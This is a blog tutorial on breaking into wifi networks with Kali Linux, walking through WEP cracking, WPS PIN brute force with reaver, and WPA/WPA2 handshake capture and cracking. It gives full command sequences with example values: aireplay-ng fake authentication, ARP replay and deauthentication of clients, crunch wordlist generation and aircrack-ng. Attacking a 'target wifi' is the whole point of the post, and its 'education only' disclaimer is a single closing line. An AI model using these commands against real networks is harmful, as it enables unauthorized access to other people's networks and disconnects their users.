What do you need to hack a wifi password?
Here, I am not gonna show you how to hack a wifi password with your mobile. So, you need a computer with the operating system of Kali Linux even it is your main OS or in a Virtual Box. And you also need a wifi adapter that supports monitor mode.
I suggest you buy a TP-Link AC600 wifi adapter because it supports both 2.4Ghz and 5Ghz frequencies and I use it too and it's cheaper for you. This wifi adapter works in every OS but in Kali, it will not work at first because it uses some drivers which is not pre-installed in Kali Linux.
To connect the TP-Link AC600 wifi adapter with Kali read this article below...
Now the system is all done and you can hack the wifi but first of all, you need to enable the monitor mode of the wifi adapter which is essential to hacking wifi using Kali.
How to enable Monitor Mode of wifi adapter?
Step 1: Open Terminal in your kali Linux (in root login of kali)
Step 2: Check if wifi adapter is configure >> iwconfig
Here you will see your wifi adapter device name in my case it is wlan0 and if you don't see this then reconnect your wifi adapter or see the USB in the device section at the upper left window if it does not checked then click once to check it.
Step 3: Now execute >> ifconfig wlan0 down command to down your wifi adapter it is safe to enable the monitor mode.
Step 4: Now kill all the processes running in the Kali Linux by executing this command >> airmon-ng check kill
Step 5: Now turn on the monitor mode by executing this command >> ifconfig wlan0 mode monitor
Step 6: Now restart the wifi adapter by executing this command >> ifconfig wlan0 up
Now your wifi adapter is in monitor mode you can check by executing iwconfig command. All commands are executing below on this image.
Here we are all ready to hack the wifi. but before it, we should know about something which is very important to know, that is WEP, WPA and WPA2. These three encryption are working on a wifi password and hacking these encrypted passwords are different each but not too, you just need to execute some commands.
How to hack WEP encrypted wifi password?
In monitor mode, we should execute some basic commands to hack a WEP wifi password. There are some methods to hack, So I will explain each method.
Method 1::
Step 1: We should run a command to find the wifi around us (Note; the wifi network will be found by the wifi adapter so make sure it is connected and in monitor mode).
To find wifi networks around us we should run the command airodump-ng Interface_name Here interface_name is the wifi adapter name in my case it is now mon0 I hope in your computer it will be wlan0 etc.
cmd:: airodump-ng mon0 ( replace the mon0 to your wifi adapter name which can be shown by iwconfig command )
After executing this command the scan will be running and it will find wifi networks near you. But you should check the table content named PWR it should be less than -45 otherwise an error will occur that the wifi network is not in range.
When you find your target wifi stop the process by clicking Ctrl + C
Here you should note 2 things bssid and channel (CH). You can see it in the above image in the third row a WEP wifi network is showing named Test_AP3.
You should split the terminal into two sections as shown in the above image.
Step 2: Now run a command in which some file will be created in the root and we just use the .cap extension file.
cmd:: airodump-ng --bssid bssid_number --channel channel_number --write file_name Interface
Example >> airodump-ng --bssid F8:23:B2:B9:50:A8 --channel 1 --write basic_wep mon0
after executing the command you will see a scan like an image below.
In the image above you will see I have made a circle in the data section if it is increasing rapidly the below hack will work otherwise we should execute two more commands to hack this.
Step 3: You can skip this step if the data field value is increasing of your target wifi, if don't then continue this step.
1. cmd :: aireplay-ng --fakeauth 0 -a wifi_bssid -h adapter_bssid Interface_name
2. cmd :: aireplay-ng --arpreplay -b wifi_bssid -h adapter_bssid Interface_name
wifi_bssid is your target wifi bssid, adapter_bssid is your wifi adapter bssid which you can find by ifconfig like shown below in the image and Interface_name is your wifi adapter name in my case it is mon0.
Example::
1. aireplay-ng --fakeauth 0 -a 64:16:F0:EC:7B:F3 -h 48:5D:60:2A:45:25 mon0
2. aireplay-ng --arpreplay -a 64:16:F0:EC:7B:F3 -h 48:5D:60:2A:45:25 mon0
After these commands run the data value will increase and you can follow the rest commands mentioned below.
This command should be run during step 2 command running and will be executed sequentially one by one. 1 number command will execute first and then immediately run 2 number command.
This process need 3 split terminals so make sure you split your kali terminal into 3 windows.
Step 4: After executing the above command now some files have been created in the root you can see the files by executing the ls command in the split section of the terminal because the above step 2 command should be running until we hack the password.
Now use aircrack-ng command to crack the password from the file that is created by executing the Step 2 command the above image shows how to execute aircrack-ng command.
cmd:: aircrack-ng file_name
example:: aircrack-ng basic_wep-01.cap
After executing this command you cracked the password. In the image below you will see the key found massage here you will see the password highlight in the image below.
The password is separated by a colon and you can use that password after removing the colons.
You will the key > 41:73:32:33:70 After removing the colon the wifi password will be 4173323370. Now use this password and access that WEP wifi.
How to hack WPA/WPA2 encrypted wifi passwords?
Hacking WPA/WPA2 wifi password is a little bit different from WEP security. There are two conditions while hacking WPA/WPA2 type security password. The first is when the WPS push button is enabled and the second is when the WPS button is disabled.
WPS push button is like when it is disabled no new client can connect to it without clicking the WPS button on the router but don't worry it can be hackable.
Note:- this process is also needed monitor mode enabled, So check how to enable monitor mode at the starting of this article.
Hacking when the WPS push button is enabled:
Step 1: First of all we need to search the wifi network near to you. For wifi network search execute this command >> wash --interface wlan0
When you find your target network then click Ctrl + c to stop scanning.
Step 2: Here we will execute 2 commands one by one even just 2-second gaps in executing these commands.
First, we have a command that will crack the wifi password but it is not just enough we should execute the second command too because that command will associate your system to the wifi network.
1. cmd: reaver --bssid wifi_bssid --channel channel_number --interface Interface_name -vvv --no-associate
2. cmd: aireplay-ng --fakeauth 30 -a wifi_bssid -h adapter_bssid Interface_name
Note:- if the Lck is No only then this method will work to hack the password and in most cases, it is set as default No.
Here wifi_bssid is bssid of your target wifi network and channel_number is the CH number of your target network. Also, Interface_name and adapter_bssid can be found by executing ifconfig command. we have discussed this in the WEP hacking section in this article.
Example:
1. reaver --bssid 00:10:18:90:2D:EE --channel 1 --interface mon0 -vvv --no-associate
2. aireplay-ng --fakeauth 30 -a 00:10:18:90:2D:EE -h 48:5D:60:2A:45:25 mon0
Here 1 number command will run first and immediately in 3 seconds the 2 number command will run. After the scanning stop, it will show the password of the targeted wifi network like shown below in the image.
Hacking when the WPS push button is disabled:
Step 1: First search the networks around you by executing this command below.
cmd:: airodump-ng Interface_name
Example>> airodump-ng mon0
Interface_name is the name of your wireless adapter. You can find it by executing the command ifconfig on the terminal. In my case it is mon0.
When you find your targeted network follow the step mentioned below.
Step 2: Now execute a command shown below to get the essential data of the target network which will be then used to crack the password. And keep the scan running until the next command executed.
cmd:: airodump-ng --bssid bssid_number --channel channel_number --write file_name Interface
Example>> airodump-ng --bssid 00:10:18:90:2D:EE --channel 1 --write wpa_handshake mon0
bssid_number is the bssid of the target wifi, channel_number is the channel (CH) value of wifi, file_name is the name of the file which will be created after execution of the command.
Step 3: To handshake with the network you need to execute another command in the split terminal while scanning the above arodump-ng command.
cmd:: aireplay-ng --deauth 4 -a wifi_bssid -c adapter_bssid Interface
Example>> aireplay-ng --deauth 4 -a 00:10:18:90:2D:EE -c 80:E6:50:22:A2:E8 mon0
Here wifi_bssid is the bssid of the target network, adapter_bssid is the bssid of your wifi adapter which you can get by executing ifconfig command, Interface is your wifi adapter name.
Above in the WEP encryption, I have mentioned finding bssid of your adapter.
Keep running the command until you see the WPA handshake on the upside of your terminal.
Step 4: Now we have to make a .txt file where we will put the bunch of passwords that will authenticate one by one with the file that we made by executing the above commands.
You can make that file by typing the possible password which can be the password of the target network otherwise you can use this command to make the possible password file. below is the command:
Syntax:- crunch [min] [max] [characters] -t [pattern] -o [filename]
Example>> crunch 6 8 abc1234$ -t a@@@@3 -o text.txt
Here, characters are the value, alphabet and special character that can be used to make the password. the pattern is like from which value of character the password starts or ends or used in the middle of the password. @ is like here the rest value can be placed in the password.
Note:- when you use the pattern then the min and max value should be the same.
You can see the password by executing the command that is shown below.
cmd:: cat file_name
Example>> cat test.txt
Now the file is created if you want to stop the showing password press Ctrl + c.
Step 5: Now authenticate the password which you made by the above commands with the file that is created by Step 2 and Step 3 above.
First, to see the file made by Step 2 and Step 3 execute the command ls in your Linux terminal.
Now to authenticate the password with that file use the command shown below.
cmd:: aircrack-ng file_name -w pass_file
Example>> aircrack-ng wpa_handshake-01.cap -w test.txt
here file_name is the file that is made by Step 2 and Step 3 and pass_file is the file that is made by Step 4 in the article above.
After the execution of the above command, a scan will run for some minutes or hours and if the password finds then the scan will complete and it will show the password of the target wifi.
Conclusion:-
This article is only for education. Don't do anything that is illegal. If you have been in trouble then there is no responsibility for my website (ComputerPry).
You can support me with little money. My payment UPI id is 8839898858@paytm or you can bank transfer Ac. no. 919993153038 IFSC PYTM0123456 Name Aditya Narayan Soni
Thanks for reading my article.
#hacking #wifihacking #kalilinux #hackingworld #ethicalhacking #legalhacks
nice post i found it very useful and working
ReplyDelete